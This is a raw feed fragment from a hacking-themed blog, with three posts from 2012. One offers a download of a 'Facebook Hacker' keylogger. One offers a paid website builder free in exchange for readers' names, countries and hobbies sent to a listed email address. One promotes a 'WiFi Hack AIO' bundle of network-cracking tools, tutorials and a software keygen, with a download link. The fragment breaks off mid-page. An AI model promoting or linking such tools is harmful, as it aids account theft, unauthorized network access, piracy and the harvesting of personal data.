&lt;span class=&quot;fullpost&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href=&quot;http://www.2shared.com/file/Xa43USjl/FacebookHacker-RHA.html?&quot;&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/6535044698982791925/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/download-facebook-hacker-v10-keylogging.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/6535044698982791925'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/6535044698982791925'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/download-facebook-hacker-v10-keylogging.html' title='Download Facebook Hacker V1.0 A Keylogging Software '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7xUMnW7l6oSJhS6T3VNb79RetB99QyXGg43_J3vJQWpi1dMvF2pAlwP6l4eIg6oeEq6Ek-BWOqnwOF4npqPE20k3H4VR4pAsPWyY-O3UZvWer-et3ryuZiY3vF9yheR9WVplBHQXSYms/s72-c/Fig2.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-2997106736215584720</id><published>2012-12-23T10:25:00.002-08:00</published><updated>2012-12-23T10:36:54.795-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="affordable web design"/><category scheme="http://www.blogger.com/atom/ns#" term="create free flash website"/><category scheme="http://www.blogger.com/atom/ns#" term="create your own web design"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Software Reviews"/><title type='text'>Given Away This Month: A4DeskPro Flash Website Builder For Free</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #33211f; font-family: Helvetica, Arial, sans-serif; font-size: 16px; line-height: 24px; margin-bottom: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://researchwritingreview.com/wp-content/uploads/2011/07/A4DeskPro-Flash-Website-Builder.jpg&quot; style=&quot;border: 0px; color: #c89a2b; font-family: inherit; font-size: 16px; font-style: inherit; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;&quot; class=&quot;size-full wp-image-2315 alignleft&quot; height=&quot;124&quot; src=&quot;http://researchwritingreview.com/wp-content/uploads/2011/07/A4DeskPro-Flash-Website-Builder.jpg&quot; style=&quot;border: 0px; display: inline; float: left; font-family: inherit; font-size: 16px; font-style: inherit; margin: 0px 15px 15px 0px; outline: 0px; padding: 0px; vertical-align: baseline;&quot; title=&quot;A4DeskPro Flash Website Builder&quot; width=&quot;228&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #33211f; font-family: Helvetica, Arial, sans-serif; font-size: 16px; line-height: 24px; margin-bottom: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
A4DeskPro&amp;nbsp;Flash Website Builder is a very easy-to-use software which will help you create Flash website and presentations, with multiple menus and sub-menus, with stunning flash animation effects and color with just few mouse clicks – right on your desktop computer (or notebook). NO coding knowledge, NO Internet connection, and NO purchase of high priced commercial flash editing software required.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #33211f; font-family: Helvetica, Arial, sans-serif; line-height: 24px; margin-bottom: 15px; outline: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
A number of my clients have expressed interest in developing&amp;nbsp;Flash websites&amp;nbsp;and micro sites. As someone who is not familiar with Flash programming, I&#39;ve had to shy away from these projects and have lost money as a result. I was recently introduced to&amp;nbsp;A4DeskPro Flash Website Builder&amp;nbsp;which claims to be able to produce Flash websites with no programming knowledge. Is this a solution to my problems? What now follows is my review of this software package.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
After a painless and professional installation process I start up the application and choose to build a new website. A4DeskPro comes packed with templates and it is from one of these templates that you will build your new site. The templates are professionally created and cover a wide range of themes that should cater for the vast majority of needs.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
On picking an existing template, the application loads with a suggested menu structure. Top level menu nodes can be edited or disabled and sub menus can be added, edited and removed. You need to ensure that the template that you choose has enough top level menu nodes, but this will not be a problem for 99% of websites out there.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
&lt;a href=&quot;http://www.a4deskpro.com/&quot; style=&quot;color: #666666;&quot;&gt;&lt;img align=&quot;right&quot; alt=&quot;Flash website builder&quot; border=&quot;0&quot; src=&quot;http://www.stagehead.com/images/template_software.jpg&quot; /&gt;&lt;/a&gt;Editing the content for each menu and sub menu node is equally straightforward. You enter your HTML code in the bottom half of the screen and then view the results of your edits in the top half. If you don&#39;t know HTML code, then the application offers helpful buttons to make the process easy.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
A4DeskPro&amp;nbsp;allows&amp;nbsp;&lt;strong&gt;easy editing of the site title and meta tags for both your keywords and description&lt;/strong&gt;. A useful feature as these are used by many search engines. It also supports user friendly methods of&amp;nbsp;&lt;strong&gt;adding individual pictures and photo albums&lt;/strong&gt;,&amp;nbsp;&lt;strong&gt;background music, forms and video&lt;/strong&gt;&amp;nbsp;to your site. Note that your host must support php to use the contact form.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
You can save your website with a few clicks and also preview the site in a web browser. Finally, the application helps you publish the finished website with its built in FTP wizard.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
Creating a new website is a breeze with A4DeskPro. The application is intuitive and user friendly. I didn&#39;t need to turn to the extensive online help at all before I had created, edited and published my first flash website.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
Pricing is geared around use of the templates. You can either register o&lt;a href=&quot;http://www.a4deskpro.com/&quot; style=&quot;color: #666666;&quot;&gt;&lt;img align=&quot;left&quot; alt=&quot;Flash website creator&quot; border=&quot;0&quot; src=&quot;http://www.faico.net/website_builder_software.gif&quot; /&gt;&lt;/a&gt;ne template for use on one site forever for a one off payment of $49.95, or you can choose from a number of access plans. These access plans allow you to make as many websites as you want and then edit those websites forever.&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; font-size: medium; line-height: normal;&quot;&gt;
$129 allows creation of as many websites as you want for three months from any of their templates. Once built, you can edit these sites after the three months have expired but you can&#39;t create new ones. $575 allows unlimited creation of unlimited websites using any the templates. There is currently a sale which slashes these prices, so get in quickly to benefit!&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;But i am giving this software for free with unlimited websites.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Just Email me&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;With your&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Name=&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Country=&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Hobby=&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;My Email Address= Hackerx312@hotmail.com&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Enjoy my gift of worth 575$.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: black; font-family: Arial, Helvetica, sans-serif; line-height: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/2997106736215584720/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/given-away-this-month-a4deskpro-flash.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2997106736215584720'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2997106736215584720'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/12/given-away-this-month-a4deskpro-flash.html' title='Given Away This Month: A4DeskPro Flash Website Builder For Free'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-1052161833922696074</id><published>2012-11-24T10:59:00.002-08:00</published><updated>2013-09-07T02:29:55.131-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack Wifi"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Password Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Hack AIO"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Security"/><title type='text'>WiFi Hack AIO 2010 </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
I have also posted other methods in my previous posts &lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html&quot;&gt;WEP Password Cracker&lt;/a&gt; and&amp;nbsp;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html&quot;&gt;Hack Wifi Password With Backtrack 5&lt;/a&gt;.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDcfgsD_XiQLqqHeKuP5PHRX2lsknJSIVSJ3atqOoHSddM-Pys8pGMWjheZ11psawrQaN9CxPpNKz8hxx-QrmpwBWf1QCEChlEN2gJOGyxCILJZXK7h0UlQWn5h36zr2oVt4bfGfxsnHw/s1600/wifihack2010allinoness1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDcfgsD_XiQLqqHeKuP5PHRX2lsknJSIVSJ3atqOoHSddM-Pys8pGMWjheZ11psawrQaN9CxPpNKz8hxx-QrmpwBWf1QCEChlEN2gJOGyxCILJZXK7h0UlQWn5h36zr2oVt4bfGfxsnHw/s320/wifihack2010allinoness1.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgk9L7-ucCttQk-63ubN-SklISS7ve6yfgCQVvU8s7q3lm5i3JjaQCe-73CiuiJNKSp7sDPaUMkG_C-HQwjBNhdWjUHwajqMvDxL7qiD2rXJ3f_kyPWywUD-xGHvDG5DX2kQtx6Cq4F4/s1600/wifihack2010allinoness2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class=&quot;inner-content&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;WiFi Hack AIO 2010&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;163.11mb&lt;/span&gt;
&lt;br /&gt;

&lt;br /&gt;
This time we bring you the best software to hack the WiFi networks 2010. 
&lt;br /&gt;
The compilation includes powerful encryption software in network 
&lt;br /&gt;
detection and ideal for hacking WiFi networks. Download Programs to hack 
&lt;br /&gt;
Free Full WiFi networks.
&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=1848613746302332574&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;This AiO contains:&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Windows Tools 1&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;div&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgk9L7-ucCttQk-63ubN-SklISS7ve6yfgCQVvU8s7q3lm5i3JjaQCe-73CiuiJNKSp7sDPaUMkG_C-HQwjBNhdWjUHwajqMvDxL7qiD2rXJ3f_kyPWywUD-xGHvDG5DX2kQtx6Cq4F4/s1600/wifihack2010allinoness2.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;231&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgk9L7-ucCttQk-63ubN-SklISS7ve6yfgCQVvU8s7q3lm5i3JjaQCe-73CiuiJNKSp7sDPaUMkG_C-HQwjBNhdWjUHwajqMvDxL7qiD2rXJ3f_kyPWywUD-xGHvDG5DX2kQtx6Cq4F4/s320/wifihack2010allinoness2.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;span class=&quot;inner-content&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;color: orange;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;inner-content&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;div&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WiresHark
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
AirSnare
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WirelessKeyView
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wifi Monster
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
NetStumbler
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Easy Wifi Radar
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
SmartSniff
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Ettercap
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WinPcap
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
CommView
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Windows Tools 2
&lt;/span&gt;&lt;/h2&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV9GxOEaudv6wW1E9nXuKFqMiu1rUmGpuDhiLnJ54qp_ASYrBrslPkDEmYcufOoizDMJKviFPk6i8eTQmoSZW9aeEoUE4PRh7gXUM44HXCMH3YUKujtu3SB2wog3WRMIw_3cRMqVy2Cxg/s1600/wifihack2010allinoness3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;230&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiV9GxOEaudv6wW1E9nXuKFqMiu1rUmGpuDhiLnJ54qp_ASYrBrslPkDEmYcufOoizDMJKviFPk6i8eTQmoSZW9aeEoUE4PRh7gXUM44HXCMH3YUKujtu3SB2wog3WRMIw_3cRMqVy2Cxg/s320/wifihack2010allinoness3.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Nmap
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wirelessmon
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
PocketWarrior
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Inssider
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
RemoteAnyWhere
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
PmoniPacketMon
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
ApTools
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WiFiFoFum
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Advanced Port Scanner
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
NetSurveyor
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Backtrack&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiINg8po6wHdIT_mT-VD9oA2-opEBHObSaLWZDnPzrhRaoMifIhMIP8emm1SebUaIbQvJJWrmAorjWdV7EIG4lnJQPNhtDyUCnycq8Z_SyWCof7fz8NFfAj_dAxsTqOmDljso-2VxuRu6U/s1600/wifihack2010allinoness4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;284&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiINg8po6wHdIT_mT-VD9oA2-opEBHObSaLWZDnPzrhRaoMifIhMIP8emm1SebUaIbQvJJWrmAorjWdV7EIG4lnJQPNhtDyUCnycq8Z_SyWCof7fz8NFfAj_dAxsTqOmDljso-2VxuRu6U/s400/wifihack2010allinoness4.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack 4 Pre Release
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack 4 Beta Release
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack 3 VmWare Image
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack 3
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack 3 USB Version
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
PDFs &amp;amp; Tutorials&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIaQkD0S4cTEDUSfMjnVKRcDYsQCyVSnP2bAjJGW1EVLcYT6Ew2wI-BQ0JtsWsYf2sGxfG_EMUlK0uKsVyr5o-8lKByczCr8-A4R8P7Ku-rdSrhMuCt6yHOUmGxOR4uCNwenPyO9h3Mtk/s1600/wifihack2010allinoness5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;229&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIaQkD0S4cTEDUSfMjnVKRcDYsQCyVSnP2bAjJGW1EVLcYT6Ew2wI-BQ0JtsWsYf2sGxfG_EMUlK0uKsVyr5o-8lKByczCr8-A4R8P7Ku-rdSrhMuCt6yHOUmGxOR4uCNwenPyO9h3Mtk/s320/wifihack2010allinoness5.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Hacking Wireless Networks
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Cracking WEP and WPA WiFi
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wifi Hacking
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Hacking Asus WL520gU
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
BackTrack PDFs
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WiFi Advanced Fuzzing
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wifi Security
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wireless Sniffing WiresHark
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wireless Hacking Tools
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Bonus Software&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKz-d7DgTUxziWGWMBcjR3QfJUt4CI1bGhDmUjmBE-Pa8-2UwSuKKRnKAVr-1ThaYv_ogjpVxadW9x6_h6kN35fzX6GvE7BA3rCDhvjWrpxA7aDHsf_bCgEhyphenhyphen54HXcA5-FUaI0_5MyBrk/s1600/wifihack2010allinoness6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;229&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKz-d7DgTUxziWGWMBcjR3QfJUt4CI1bGhDmUjmBE-Pa8-2UwSuKKRnKAVr-1ThaYv_ogjpVxadW9x6_h6kN35fzX6GvE7BA3rCDhvjWrpxA7aDHsf_bCgEhyphenhyphen54HXcA5-FUaI0_5MyBrk/s320/wifihack2010allinoness6.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/h2&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Net Tools
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
WepGen
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Cantennator
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Anchorfree
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Cain and Abel
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Wifi Drivers
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Brutus
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
VmWare Keygen
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
LanHelper
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Install
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
This is a portable version
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;inner-content&quot;&gt;
Just Install the setup file
&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;inner-content&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;inner-content&quot;&gt;

&lt;br /&gt;

&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;&lt;span style=&quot;color: green;&quot;&gt;&lt;/span&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/Ea5IA&quot; target=&quot;_blank&quot;&gt;&lt;br /&gt;&lt;/a&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;a href=&quot;http://luckyshare.net/3934257500/Wifi%20Hack%202010%20All%20In%20One.rar&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
If above methods can&#39;t works for you then you can also try these&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
